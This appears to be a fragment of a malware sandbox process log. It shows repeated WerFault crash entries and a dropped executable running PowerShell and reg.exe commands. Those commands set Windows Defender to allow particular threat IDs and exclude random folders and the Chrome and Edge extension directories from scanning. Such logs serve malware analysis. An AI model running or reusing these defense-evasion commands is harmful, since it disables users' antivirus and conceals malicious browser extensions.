C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5828 -ip 58281⤵PID:1192
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5828 -ip 58281⤵PID:3420
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5828 -ip 58281⤵PID:2652
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 5828 -ip 58281⤵PID:864
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5828 -ip 58281⤵PID:5688
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 5828 -ip 58281⤵PID:652
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5828 -ip 58281⤵PID:2088
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5828 -ip 58281⤵PID:2084
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 5828 -ip 58281⤵PID:5356
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5828 -ip 58281⤵PID:1716
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 5828 -ip 58281⤵PID:5704
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 5828 -ip 58281⤵PID:940
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5828 -ip 58281⤵PID:3972
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 5828 -ip 58281⤵PID:4272
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5828 -ip 58281⤵PID:5392
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5828 -ip 58281⤵PID:6020
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5828 -ip 58281⤵PID:6004
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 5828 -ip 58281⤵PID:2628
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5828 -ip 58281⤵PID:6120
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5828 -ip 58281⤵PID:5532
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5828 -ip 58281⤵PID:3380
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5828 -ip 58281⤵PID:3124
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 5828 -ip 58281⤵PID:1384
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5828 -ip 58281⤵PID:1832
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5828 -ip 58281⤵PID:5980
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5828 -ip 58281⤵PID:860
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5828 -ip 58281⤵PID:2168
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 5828 -ip 58281⤵PID:5312
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5828 -ip 58281⤵PID:3868
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 5828 -ip 58281⤵PID:5432
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 5828 -ip 58281⤵PID:484
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 5828 -ip 58281⤵PID:3064
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5828 -ip 58281⤵PID:3540
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5828 -ip 58281⤵PID:3704
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 5828 -ip 58281⤵PID:6080
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 5828 -ip 58281⤵PID:196
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 5828 -ip 58281⤵PID:1580
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 5828 -ip 58281⤵PID:4620
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5828 -ip 58281⤵PID:4324
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 5828 -ip 58281⤵PID:5192
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5828 -ip 58281⤵PID:1948
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 5828 -ip 58281⤵PID:3444
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 5828 -ip 58281⤵PID:1764
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5828 -ip 58281⤵PID:1084
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5828 -ip 58281⤵PID:5100
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5828 -ip 58281⤵PID:5540
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5828 -ip 58281⤵PID:2452
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5828 -ip 58281⤵PID:5260
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 5828 -ip 58281⤵PID:4208
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5828 -ip 58281⤵PID:5392
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1432
-
C:\Users\Admin\AppData\Local\Temp\RQPXR0N3\2WsCboUrj.exeC:\Users\Admin\AppData\Local\Temp\RQPXR0N3\2WsCboUrj.exe z0 /gWdidO 757674 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1916 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4212 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:652
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:5184
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:5716
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:868
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:2428
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:5724
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:5704
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:5408
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:616
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:892
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:5220
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:768
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:5468
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:1544
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:988
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:2232
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:6108
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:1148
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:2088
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:3696
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:5392
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:4056
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:1588
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:2944
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:3760
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:1604
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:396
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:5412
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:1740
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AMqhlrBDqRJU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AMqhlrBDqRJU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OJBbginKvssDnbEKbsR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OJBbginKvssDnbEKbsR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UQtSSXvqU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UQtSSXvqU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ezMWJXFFLyUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ezMWJXFFLyUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hMiQKFvmPLjeC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hMiQKFvmPLjeC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\CSlqozbqXBZGgaVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\CSlqozbqXBZGgaVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wqgwJMWXAwfbGfvq\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wqgwJMWXAwfbGfvq\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3132 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AMqhlrBDqRJU2" /t REG_DWORD /d 0 /reg:323⤵PID:1452
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AMqhlrBDqRJU2" /t REG_DWORD /d 0 /reg:324⤵PID:2360
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AMqhlrBDqRJU2" /t REG_DWORD /d 0 /reg:643⤵PID:4736
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJBbginKvssDnbEKbsR" /t REG_DWORD /d 0 /reg:323⤵PID:1888
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJBbginKvssDnbEKbsR" /t REG_DWORD /d 0 /reg:643⤵PID:1048
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UQtSSXvqU" /t REG_DWORD /d 0 /reg:323⤵PID:5768
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UQtSSXvqU" /t REG_DWORD /d 0 /reg:643⤵PID:3436
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ezMWJXFFLyUn" /t REG_DWORD /d 0 /reg:323⤵PID:4776
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ezMWJXFFLyUn" /t REG_DWORD /d 0 /reg:643⤵PID:1692
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hMiQKFvmPLjeC" /t REG_DWORD /d 0 /reg:323⤵PID:4076
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hMiQKFvmPLjeC" /t REG_DWORD /d 0 /reg:643⤵PID:556
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\CSlqozbqXBZGgaVB /t REG_DWORD /d 0 /reg:323⤵PID:1676
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\CSlqozbqXBZGgaVB /t REG_DWORD /d 0 /reg:643⤵PID:4524
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:2604
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:2452
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:860
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:1448
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi /t REG_DWORD /d 0 /reg:323⤵PID:6140
-
